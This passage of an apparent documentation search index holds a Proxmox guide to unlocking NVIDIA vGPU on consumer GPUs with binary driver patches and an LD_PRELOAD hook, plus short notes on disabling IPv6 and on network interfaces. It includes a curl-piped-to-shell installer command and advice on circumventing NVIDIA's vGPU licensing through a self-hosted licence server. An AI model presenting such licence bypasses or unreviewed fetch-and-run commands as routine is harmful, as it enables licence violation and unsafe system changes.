You can follow this guide if you have a vGPU supported card from this list, or if you are using a consumer GPU from the GeForce series or a non-vGPU qualified Quadro GPU. There are several sections with a title similar to \"Have a vGPU supported GPU? Read here\" in this document, make sure to read those very carefully as this is where the instructions differ for a vGPU qualified card and a consumer card.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#supported-cards", "title": "Supported cards", "text": "The following consumer/not-vGPU-qualified NVIDIA GPUs can be used with vGPU: - Most GPUs from the Maxwell 2.0 generation (GTX 9xx, Quadro Mxxxx, Tesla Mxx) EXCEPT the GTX 970 - All GPUs from the Pascal generation (GTX 10xx, Quadro Pxxxx, Tesla Pxx) - All GPUs from the Turing generation (GTX 16xx, RTX 20xx, Txxxx)
If you have GPUs from the Ampere and Ada Lovelace generation, you are out of luck, unless you have a vGPU qualified card from this list like the A5000 or RTX 6000 Ada. If you have one of those cards, please consult the NVIDIA documentation for help with setting it up.
!!! THIS MEANS THAT YOUR RTX 30XX or 40XX WILL NOT WORK !!!
This guide and all my tests were done on a RTX 2080 Ti which is based on the Turing architechture.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#important-notes-before-starting", "title": "Important notes before starting", "text": " This tutorial assumes you are using a clean install of Proxmox VE 8.0. If you are using Proxmox VE 8.0, you MUST use 16.x drivers. Older versions only work with pve 7 If you tried GPU-passthrough before, you absolutely MUST revert all of the steps you did to set that up. If you only have one GPU in your system with no iGPU, your local monitor will NOT give you any output anymore after the system boots up. Use SSH or a serial connection if you want terminal access to your machine. Most of the steps can be applied to other linux distributions, however I'm only covering Proxmox VE here. ", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#are-you-upgrading-from-a-previous-version-of-this-guide", "title": "Are you upgrading from a previous version of this guide?", "text": "If you are upgrading from a previous version of this guide, you should uninstall the old driver by running nvidia-uninstall
first.
Then you also have to make sure that you are using the latest version of vgpu_unlock-rs
, otherwise it won't work with the latest driver.
Either delete the folder /opt/vgpu_unlock-rs
or enter the folder and run git pull
and then recompile the library again using cargo build --release
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#packages", "title": "Packages", "text": "Make sure to add the community pve repo and get rid of the enterprise repo (you can skip this step if you have a valid enterprise subscription)
echo \"deb http://download.proxmox.com/debian/pve bookworm pve-no-subscription\" >> /etc/apt/sources.list\nrm /etc/apt/sources.list.d/pve-enterprise.list\n
Update and upgrade
apt update\napt dist-upgrade\n
We need to install a few more packages like git, a compiler and some other tools.
apt install -y git build-essential dkms pve-headers mdevctl\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#git-repos-and-rust-compiler", "title": "Git repos and Rust compiler", "text": "First, clone this repo to your home folder (in this case /root/
)
git clone https://gitlab.com/polloloco/vgpu-proxmox.git\n
You also need the vgpu_unlock-rs repo
cd /opt\ngit clone https://github.com/mbilker/vgpu_unlock-rs.git\n
After that, install the rust compiler
curl https://sh.rustup.rs -sSf | sh -s -- -y --profile minimal\n
Now make the rust binaries available in your $PATH (you only have to do it the first time after installing rust)
source $HOME/.cargo/env\n
Enter the vgpu_unlock-rs
directory and compile the library. Depending on your hardware and internet connection that may take a while
cd vgpu_unlock-rs/\ncargo build --release\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#create-files-for-vgpu-unlock", "title": "Create files for vGPU unlock", "text": "The vgpu_unlock-rs library requires a few files and folders in order to work properly, lets create those
First create the folder for your vgpu unlock config and create an empty config file
mkdir /etc/vgpu_unlock\ntouch /etc/vgpu_unlock/profile_override.toml\n
Then, create folders and files for systemd to load the vgpu_unlock-rs library when starting the nvidia vgpu services
mkdir /etc/systemd/system/{nvidia-vgpud.service.d,nvidia-vgpu-mgr.service.d}\necho -e \"[Service]\\nEnvironment=LD_PRELOAD=/opt/vgpu_unlock-rs/target/release/libvgpu_unlock_rs.so\" > /etc/systemd/system/nvidia-vgpud.service.d/vgpu_unlock.conf\necho -e \"[Service]\\nEnvironment=LD_PRELOAD=/opt/vgpu_unlock-rs/target/release/libvgpu_unlock_rs.so\" > /etc/systemd/system/nvidia-vgpu-mgr.service.d/vgpu_unlock.conf\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#have-a-vgpu-supported-card-read-here", "title": "Have a vgpu supported card? Read here!", "text": "If you don't have a card like the Tesla P4, or any other gpu from this list, please continue reading at Enabling IOMMU
Disable the unlock part as doing this on a gpu that already supports vgpu, could break things as it introduces unnecessary complexity and more points of possible failure:
echo \"unlock = false\" > /etc/vgpu_unlock/config.toml\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#enabling-iommu", "title": "Enabling IOMMU", "text": "", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#note-usually-this-isnt-required-for-vgpu-to-work-but-it-doesnt-hurt-to-enable-it-you-can-skip-this-section-but-if-you-run-into-problems-later-on-make-sure-to-enable-iommu", "title": "Note: Usually this isn't required for vGPU to work, but it doesn't hurt to enable it. You can skip this section, but if you run into problems later on, make sure to enable IOMMU.", "text": "To enable IOMMU you have to enable it in your BIOS/UEFI first. Due to it being vendor specific, I am unable to provide instructions for that, but usually for Intel systems the option you are looking for is called something like \"Vt-d\", AMD systems tend to call it \"IOMMU\".
After enabling it in your BIOS/UEFI, you also have to enable it in your kernel. Depending on how your system is booting, there are two ways to do that.
If you installed your system with ZFS-on-root and in UEFI mode, then you are using systemd-boot, everything else is GRUB. GRUB is way more common so if you are unsure, you are probably using that.
Depending on which system you are using to boot, you have to chose from the following two options:
GRUB Open the file `/etc/default/grub` in your favorite editor nano /etc/default/grub\n
The kernel parameters have to be appended to the variable `GRUB_CMDLINE_LINUX_DEFAULT`. On a clean installation that line should look like this GRUB_CMDLINE_LINUX_DEFAULT=\"quiet\"\n
If you are using an Intel system, append this after `quiet`: intel_iommu=on iommu=pt\n
On AMD systems, append this after `quiet`: amd_iommu=on iommu=pt\n
The result should look like this (for intel systems): GRUB_CMDLINE_LINUX_DEFAULT=\"quiet intel_iommu=on iommu=pt\"\n
Now, save and exit from the editor using Ctrl+O and then Ctrl+X and then apply your changes: update-grub\n
systemd-boot The kernel parameters have to be appended to the commandline in the file `/etc/kernel/cmdline`, so open that in your favorite editor: nano /etc/kernel/cmdline\n
On a clean installation the file might look similar to this: root=ZFS=rpool/ROOT/pve-1 boot=zfs\n
On Intel systems, append this at the end intel_iommu=on iommu=pt\n
For AMD, use this amd_iommu=on iommu=pt\n
After editing the file, it should look similar to this root=ZFS=rpool/ROOT/pve-1 boot=zfs intel_iommu=on iommu=pt\n
Now, save and exit from the editor using Ctrl+O and then Ctrl+X and then apply your changes: proxmox-boot-tool refresh\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#loading-required-kernel-modules-and-blacklisting-the-open-source-nvidia-driver", "title": "Loading required kernel modules and blacklisting the open source nvidia driver", "text": "We have to load the vfio
, vfio_iommu_type1
, vfio_pci
and vfio_virqfd
kernel modules to get vGPU working
echo -e \"vfio\\nvfio_iommu_type1\\nvfio_pci\\nvfio_virqfd\" >> /etc/modules\n
Proxmox comes with the open source nouveau driver for nvidia gpus, however we have to use our patched nvidia driver to enable vGPU. The next line will prevent the nouveau driver from loading
echo \"blacklist nouveau\" >> /etc/modprobe.d/blacklist.conf\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#applying-our-kernel-configuration", "title": "Applying our kernel configuration", "text": "I'm not sure if this is needed, but it doesn't hurt :)
update-initramfs -u -k all\n
...and reboot
reboot\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#check-if-iommu-is-enabled", "title": "Check if IOMMU is enabled", "text": "", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#note-see-section-enabling-iommu-this-is-optional", "title": "Note: See section \"Enabling IOMMU\", this is optional", "text": "Wait for your server to restart, then type this into a root shell
dmesg | grep -e DMAR -e IOMMU\n
On my Intel system the output looks like this
[ 0.007235] ACPI: DMAR 0x000000009CC98B68 0000B8 (v01 INTEL BDW 00000001 INTL 00000001)\n[ 0.007255] ACPI: Reserving DMAR table memory at [mem 0x9cc98b68-0x9cc98c1f]\n[ 0.020766] DMAR: IOMMU enabled\n[ 0.062294] DMAR: Host address width 39\n[ 0.062296] DMAR: DRHD base: 0x000000fed90000 flags: 0x0\n[ 0.062300] DMAR: dmar0: reg_base_addr fed90000 ver 1:0 cap c0000020660462 ecap f0101a\n[ 0.062302] DMAR: DRHD base: 0x000000fed91000 flags: 0x1\n[ 0.062305] DMAR: dmar1: reg_base_addr fed91000 ver 1:0 cap d2008c20660462 ecap f010da\n[ 0.062307] DMAR: RMRR base: 0x0000009cc18000 end: 0x0000009cc25fff\n[ 0.062309] DMAR: RMRR base: 0x0000009f000000 end: 0x000000af1fffff\n[ 0.062312] DMAR-IR: IOAPIC id 8 under DRHD base 0xfed91000 IOMMU 1\n[ 0.062314] DMAR-IR: HPET id 0 under DRHD base 0xfed91000\n[ 0.062315] DMAR-IR: x2apic is disabled because BIOS sets x2apic opt out bit.\n[ 0.062316] DMAR-IR: Use 'intremap=no_x2apic_optout' to override the BIOS setting.\n[ 0.062797] DMAR-IR: Enabled IRQ remapping in xapic mode\n[ 0.302431] DMAR: No ATSR found\n[ 0.302432] DMAR: No SATC found\n[ 0.302433] DMAR: IOMMU feature pgsel_inv inconsistent\n[ 0.302435] DMAR: IOMMU feature sc_support inconsistent\n[ 0.302436] DMAR: IOMMU feature pass_through inconsistent\n[ 0.302437] DMAR: dmar0: Using Queued invalidation\n[ 0.302443] DMAR: dmar1: Using Queued invalidation\n[ 0.333474] DMAR: Intel(R) Virtualization Technology for Directed I/O\n[ 3.990175] i915 0000:00:02.0: [drm] DMAR active, disabling use of stolen memory\n
Depending on your mainboard and cpu, the output will be different, in my output the important line is the third one: DMAR: IOMMU enabled
. If you see something like that, IOMMU is enabled.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#nvidia-driver", "title": "NVIDIA Driver", "text": "This repo contains patches that allow you to use vGPU on not-qualified-vGPU cards (consumer GPUs). Those patches are binary patches, which means that each patch works ONLY for a specific driver version.
I've created patches for the following driver versions: - 16.2 (535.129.03) - Use this if you are on pve 8.0 (kernel 6.2, 6.5 should work too) - 16.1 (535.104.06) - 16.0 (535.54.06) - 15.1 (525.85.07) - 15.0 (525.60.12) - 14.4 (510.108.03) - 14.3 (510.108.03) - 14.2 (510.85.03)
You can choose which of those you want to use, but generally its recommended to use the latest, most up-to-date version (16.2 in this case).
If you have a vGPU qualified GPU, you can use other versions too, because you don't need to patch the driver. However, you still have to make sure they are compatible with your proxmox version and kernel. Also I would not recommend using any older versions unless you have a very specific requirement.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#obtaining-the-driver", "title": "Obtaining the driver", "text": "NVIDIA doesn't let you freely download vGPU drivers like they do with GeForce or normal Quadro drivers, instead you have to download them through the NVIDIA Licensing Portal (see: https://www.nvidia.com/en-us/drivers/vgpu-software-driver/). You can sign up for a free evaluation to get access to the download page.
NB: When applying for an eval license, do NOT use your personal email or other email at a free email provider like gmail.com. You will probably have to go through manual review if you use such emails. I have very good experience using a custom domain for my email address, that way the automatic verification usually lets me in after about five minutes.
I've created a small video tutorial to find the right driver version on the NVIDIA Enterprise Portal. In the video I'm downloading the 15.0 driver, if you want a different one just replace 15.0 with the version you want:
After downloading, extract the zip file and then copy the file called NVIDIA-Linux-x86_64-DRIVERVERSION-vgpu-kvm.run
(where DRIVERVERSION is a string like 535.129.03
) from the Host_Drivers
folder to your Proxmox host into the /root/
folder using tools like FileZilla, WinSCP, scp or rsync.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#from-here-on-i-will-be-using-the-162-driver-but-the-steps-are-the-same-for-other-driver-versions", "title": "\u26a0\ufe0f From here on, I will be using the 16.2 driver, but the steps are the same for other driver versions", "text": "For example when I run a command like chmod +x NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run
, you should replace 535.129.03
with the driver version you are using (if you are using a different one). You can get the list of version numbers here.
Every step where you potentially have to replace the version name will have this warning emoji next to it: \u26a0\ufe0f
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#have-a-vgpu-supported-card-read-here_1", "title": "Have a vgpu supported card? Read here!", "text": "If you don't have a card like the Tesla P4, or any other gpu from this list, please continue reading at Patching the driver
With a supported gpu, patching the driver is not needed, so you should skip the next section. You can simply install the driver package like this:
\u26a0\ufe0f
chmod +x NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run\n./NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run --dkms\n
To finish the installation, reboot the system
reboot\n
Now, skip the following two sections and continue at Finishing touches
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#patching-the-driver", "title": "Patching the driver", "text": "Now, on the proxmox host, make the driver executable
\u26a0\ufe0f
chmod +x NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run\n
And then patch it
\u26a0\ufe0f
./NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run --apply-patch ~/vgpu-proxmox/535.129.03.patch\n
That should output a lot of lines ending with Self-extractible archive \"NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm-custom.run\" successfully created.\n
You should now have a file called NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm-custom.run
, that is your patched driver.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#installing-the-driver", "title": "Installing the driver", "text": "Now that the required patch is applied, you can install the driver
\u26a0\ufe0f
./NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm-custom.run --dkms\n
The installer will ask you Would you like to register the kernel module sources with DKMS? This will allow DKMS to automatically build a new module, if you install a different kernel later.
, answer with Yes
.
Depending on your hardware, the installation could take a minute or two.
If everything went right, you will be presented with this message.
Installation of the NVIDIA Accelerated Graphics Driver for Linux-x86_64 (version: 535.129.03) is now complete.\n
Click Ok
to exit the installer.
To finish the installation, reboot.
reboot\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#finishing-touches", "title": "Finishing touches", "text": "Wait for your server to reboot, then type this into the shell to check if the driver install worked
nvidia-smi\n
You should get an output similar to this one
Tue Jan 24 20:21:28 2023\n+-----------------------------------------------------------------------------+\n| NVIDIA-SMI 525.85.07 Driver Version: 525.85.07 CUDA Version: N/A |\n|-------------------------------+----------------------+----------------------+\n| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |\n| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |\n| | | MIG M. |\n|===============================+======================+======================|\n| 0 NVIDIA GeForce ... On | 00000000:01:00.0 Off | N/A |\n| 26% 33C P8 43W / 260W | 85MiB / 11264MiB | 0% Default |\n| | | N/A |\n+-------------------------------+----------------------+----------------------+\n\n+-----------------------------------------------------------------------------+\n| Processes: |\n| GPU GI CI PID Type Process name GPU Memory |\n| ID ID Usage |\n|=============================================================================|\n| No running processes found |\n+-----------------------------------------------------------------------------+\n
To verify if the vGPU unlock worked, type this command
mdevctl types\n
The output will be similar to this
0000:01:00.0\n nvidia-256\n Available instances: 24\n Device API: vfio-pci\n Name: GRID RTX6000-1Q\n Description: num_heads=4, frl_config=60, framebuffer=1024M, max_resolution=5120x2880, max_instance=24\n nvidia-257\n Available instances: 12\n Device API: vfio-pci\n Name: GRID RTX6000-2Q\n Description: num_heads=4, frl_config=60, framebuffer=2048M, max_resolution=7680x4320, max_instance=12\n nvidia-258\n Available instances: 8\n Device API: vfio-pci\n Name: GRID RTX6000-3Q\n Description: num_heads=4, frl_config=60, framebuffer=3072M, max_resolution=7680x4320, max_instance=8\n---SNIP---\n
If this command doesn't return any output, vGPU unlock isn't working.
Another command you can try to see if your card is recognized as being vgpu enabled is this one:
nvidia-smi vgpu\n
If everything worked right with the unlock, the output should be similar to this:
Tue Jan 24 20:21:43 2023\n+-----------------------------------------------------------------------------+\n| NVIDIA-SMI 525.85.07 Driver Version: 525.85.07 |\n|---------------------------------+------------------------------+------------+\n| GPU Name | Bus-Id | GPU-Util |\n| vGPU ID Name | VM ID VM Name | vGPU-Util |\n|=================================+==============================+============|\n| 0 NVIDIA GeForce RTX 208... | 00000000:01:00.0 | 0% |\n+---------------------------------+------------------------------+------------+\n
However, if you get this output, then something went wrong
No supported devices in vGPU mode\n
If any of those commands give the wrong output, you cannot continue. Please make sure to read everything here very carefully and when in doubt, create an issue or join the discord server and ask for help there.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#vgpu-overrides", "title": "vGPU overrides", "text": "Further up we have created the file /etc/vgpu_unlock/profile_override.toml
and I didn't explain what it was for yet. Using that file you can override lots of parameters for your vGPU instances: For example you can change the maximum resolution, enable/disable the frame rate limiter, enable/disable support for CUDA or change the vram size of your virtual gpus.
If we take a look at the output of mdevctl types
we see lots of different types that we can choose from. However, if we for example chose GRID RTX6000-4Q
which gives us 4GB of vram in a VM, we are locked to that type for all of our VMs. Meaning we can only have 4GB VMs, its not possible to mix different types to have one 4GB VM, and two 2GB VMs.
All of that changes with the override config file. Technically we are still locked to only using one profile, but now its possible to change the vram of the profile on a VM basis so even though we have three GRID RTX6000-4Q
instances, one VM can have 4GB or vram but we can override the vram size for the other two VMs to only 2GB.
Lets take a look at this example config override file (its in TOML format)
[profile.nvidia-259]\nnum_displays = 1 # Max number of virtual displays. Usually 1 if you want a simple remote gaming VM\ndisplay_width = 1920 # Maximum display width in the VM\ndisplay_height = 1080 # Maximum display height in the VM\nmax_pixels = 2073600 # This is the product of display_width and display_height so 1920 * 1080 = 2073600\ncuda_enabled = 1 # Enables CUDA support. Either 1 or 0 for enabled/disabled\nfrl_enabled = 1 # This controls the frame rate limiter, if you enable it your fps in the VM get locked to 60fps. Either 1 or 0 for enabled/disabled\nframebuffer = 0x74000000\nframebuffer_reservation = 0xC000000 # In combination with the framebuffer size\n# above, these two lines will give you a VM\n# with 2GB of VRAM (framebuffer + framebuffer_reservation = VRAM size in bytes).\n# See below for some other sizes\n\n[vm.100]\nfrl_enabled = 0\n# You can override all the options from above here too. If you want to add more overrides for a new VM, just copy this block and change the VM ID\n
There are two blocks here, the first being [profile.nvidia-259]
and the second [vm.100]
. The first one applies the overrides to all VM instances of the nvidia-259
type (thats GRID RTX6000-4Q
) and the second one applies its overrides only to one specific VM, that one with the proxmox VM ID 100
.
The proxmox VM ID is the same number that you see in the proxmox webinterface, next to the VM name.
You don't have to specify all parameters, only the ones you need/want. There are some more that I didn't mention here, you can find them by going through the source code of the vgpu_unlock-rs
repo.
For a simple 1080p remote gaming VM I recommend going with something like this
[profile.nvidia-259] # choose the profile you want here\nnum_displays = 1\ndisplay_width = 1920\ndisplay_height = 1080\nmax_pixels = 2073600\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#important-notes", "title": "Important notes", "text": "Q profiles can give you horrible performance in OpenGL applications/games. To fix that, switch to an equivalent A or B profile (for example GRID RTX6000-4B
)
C profiles (for example GRID RTX6000-4C
) only work on Linux, don't try using those on Windows, it will not work - at all.
A profiles (for example GRID RTX6000-4A
) will NOT work on Linux, they only work on Windows.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#common-vram-sizes", "title": "Common VRAM sizes", "text": "Here are some common framebuffer sizes that you might want to use:
512MB: framebuffer = 0x1A000000\nframebuffer_reservation = 0x6000000\n
1GB: framebuffer = 0x38000000\nframebuffer_reservation = 0x8000000\n
2GB: framebuffer = 0x74000000\nframebuffer_reservation = 0xC000000\n
3GB: framebuffer = 0xB0000000\nframebuffer_reservation = 0x10000000\n
4GB: framebuffer = 0xEC000000\nframebuffer_reservation = 0x14000000\n
5GB: framebuffer = 0x128000000\nframebuffer_reservation = 0x18000000\n
6GB: framebuffer = 0x164000000\nframebuffer_reservation = 0x1C000000\n
8GB: framebuffer = 0x1DC000000\nframebuffer_reservation = 0x24000000\n
10GB: framebuffer = 0x254000000\nframebuffer_reservation = 0x2C000000\n
12GB: framebuffer = 0x2CC000000\nframebuffer_reservation = 0x34000000\n
16GB: framebuffer = 0x3BC000000\nframebuffer_reservation = 0x44000000\n
20GB: framebuffer = 0x4AC000000\nframebuffer_reservation = 0x54000000\n
24GB: framebuffer = 0x59C000000\nframebuffer_reservation = 0x64000000\n
32GB: framebuffer = 0x77C000000\nframebuffer_reservation = 0x84000000\n
48GB: framebuffer = 0xB2D200000\nframebuffer_reservation = 0xD2E00000\n
framebuffer
and framebuffer_reservation
will always equal the VRAM size in bytes when added together.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#adding-a-vgpu-to-a-proxmox-vm", "title": "Adding a vGPU to a Proxmox VM", "text": "Go to the proxmox webinterface, go to your VM, then to Hardware
, then to Add
and select PCI Device
. You should be able to choose from a list of pci devices. Choose your GPU there, its entry should say Yes
in the Mediated Devices
column.
Now you should be able to also select the MDev Type
. Choose whatever profile you want, if you don't remember which one you want, you can see the list of all available types with mdevctl types
.
Finish by clicking Add
, start the VM and install the required drivers. After installing the drivers you can shut the VM down and remove the virtual display adapter by selecting Display
in the Hardware
section and selecting none (none)
. ONLY do that if you have some other way to access the Virtual Machine like Parsec or Remote Desktop because the Proxmox Console won't work anymore.
Enjoy your new vGPU VM :)
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#licensing", "title": "Licensing", "text": "Usually a license is required to use vGPU, but luckily the community found several ways around that. Spoofing the vGPU instance to a Quadro GPU used to be very popular, but I don't recommend it anymore. I've also removed the related sections from this guide. If you still want it for whatever reason, you can go back in the commit history to find the instructions on how to use that.
The recommended way to get around the license is to set up your own license server. Follow the instructions here (or here if the other link is down).
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#common-problems", "title": "Common problems", "text": "Most problems can be solved by reading the instructions very carefully. For some very common problems, read here:
The nvidia driver won't install/load If you were using gpu passthrough before, revert ALL of the steps you did or start with a fresh proxmox installation. If you run lspci -knnd 10de:
and see vfio-pci
under Kernel driver in use:
then you have to fix that Make sure that you are using a supported kernel version (check uname -a
) My OpenGL performance is absolute garbage, what can I do? Read here mdevctl types
doesn't output anything, how to fix it? Make sure that you don't have unlock disabled if you have a consumer gpu (more information) vGPU doesn't work on my RTX 3080! What to do? Learn to read ", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#support", "title": "Support", "text": "If something isn't working, please create an issue or join the Discord server and ask for help in the #proxmox-support
channel so that the community can help you.
When asking for help, please describe your problem in detail instead of just saying \"vgpu doesn't work\". Usually a rough overview over your system (gpu, mainboard, proxmox version, kernel version, ...) and full output of dmesg
and/or journalctl --no-pager -b 0 -u nvidia-vgpu-mgr.service
(\u2190 this only after starting the VM that causes trouble) is helpful. Please also provide the output of uname -a
and cat /proc/cmdline
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#do-not-send-me-a-dm-im-not-your-personal-support", "title": "DO NOT SEND ME A DM, I'M NOT YOUR PERSONAL SUPPORT", "text": "", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#feed-my-coffee-addiction", "title": "Feed my coffee addiction \u2615", "text": "If you found this guide helpful and want to support me, please feel free to buy me a coffee. Thank you very much!
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#further-reading", "title": "Further reading", "text": "Thanks to all these people (in no particular order) for making this project possible - DualCoder for his original vgpu_unlock repo with the kernel hooks - mbilker for the rust version, vgpu_unlock-rs - KrutavShah for the wiki - HiFiPhile for the C version of vgpu unlock - rupansh for the original twelve.patch to patch the driver on kernels >= 5.12 - mbuchel#1878 on the GPU Unlocking discord for fourteen.patch to patch the driver on kernels >= 5.14 - erin-allison for the nvidia-smi wrapper script - LIL'pingu#9069 on the GPU Unlocking discord for his patch to nop out code that NVIDIA added to prevent usage of drivers with a version 460 - 470 with consumer cards
If I forgot to mention someone, please create an issue or let me know otherwise.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#contributing", "title": "Contributing", "text": "Pull requests are welcome (factual errors, amendments, grammar/spelling mistakes etc).
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/network/disable-ipv6/", "title": "Disable IPv6 on Proxmox Permanently", "text": "By default, Proxmox IPv6 is enabled after installation. This means that the IPv6 stack is active and the host can communicate with other hosts on the same network via IPv6 protocol.
Output of ip addr
command:
You can disable IPv6 on Proxmox VE by editing the /etc/default/grub
file.
nano /etc/default/grub\n
add ipv6.disable=1
to the end of GRUB_CMDLINE_LINUX_DEFAULT
and GRUB_CMDLINE_LINUX
line. Don't change the other values at those lines.
GRUB_CMDLINE_LINUX_DEFAULT=\"ipv6.disable=1\"\nGRUB_CMDLINE_LINUX=\"ipv6.disable=1\"\n
The config should look like this:
Update the grub configuration.
update-grub\n
Save and exit. Reboot Proxmox Server to apply the changes.
Output of ip addr
command after disabling IPv6 on Proxmox VE:
", "tags": ["proxmox", "ipv6"]}, {"location": "infrastructure/proxmox/network/proxmox-networking/", "title": "Proxmox Networking", "text": "Official Proxmox networking documentation can be found here.
", "tags": ["proxmox", "network"]}, {"location": "infrastructure/proxmox/network/proxmox-networking/#basics", "title": "Basics", "text": "Proxmox network configuration file location/etc/network/interfaces\n
Restart proxmox network service to apply changessystemctl restart networking.service\n
", "tags": ["proxmox", "network"]}, {"location": "infrastructure/proxmox/network/proxmox-networking/#example-of-multi-network-interface-server", "title": "Example of Multi Network Interface Server", "text": "The next examples will be based on the following network nics, ip addr
output:
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\nlink/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n inet 127.0.0.1/8 scope host lo\n valid_lft forever preferred_lft forever\n2: enp7s0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\nlink/ether 18:c0:4d:00:9f:b7 brd ff:ff:ff:ff:ff:ff\n3: enp6s0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\nlink/ether 18:c0:4d:00:9f:b9 brd ff:ff:ff:ff:ff:ff\n4: enp12s0f4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq master vmbr0 state UP group default qlen 1000\nlink/ether 00:07:43:29:42:c0 brd ff:ff:ff:ff:ff:ff\n5: enp12s0f4d1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\nlink/ether 00:07:43:29:42:c8 brd ff:ff:ff:ff:ff:ff\n6: enp12s0f4d2: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\nlink/ether 00:07:43:29:42:d0 brd ff:ff:ff:ff:ff:ff\n7: enp12s0f4d3: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\nlink/ether 00:07:43:29:42:d8 brd ff:ff:ff:ff:ff:ff\n8: wlp5s0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\nlink/ether 8c:c6:81:f0:a6:9a brd ff:ff:ff:ff:ff:ff\n9: vmbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000\nlink/ether 00:07:43:29:42:c0 brd ff:ff:ff:ff:ff:ff\n inet 192.168.100.12/24 scope global vmbr0\n valid_lft forever preferred_lft forever\n
In order Identify physical network interfaces corresponding to Network Interfaces name in Proxmox you can follow this guide
Breakdown of the ip addr
output:
lo
is a loopback interface. enp7s0
is a 2.5G network interface. enp6s0
is a 1G network interface. enp12s0f4
is a 10G network interface. enp12s0f4d1
is a 10G network interface. enp12s0f4d2
is a 10G network interface. enp12s0f4d3
is a 10G network interface. wlp5s0
is a Wifi network interface vmbr0
is a bridge interface. The content of the /etc/network/interfaces
after fresh installation:
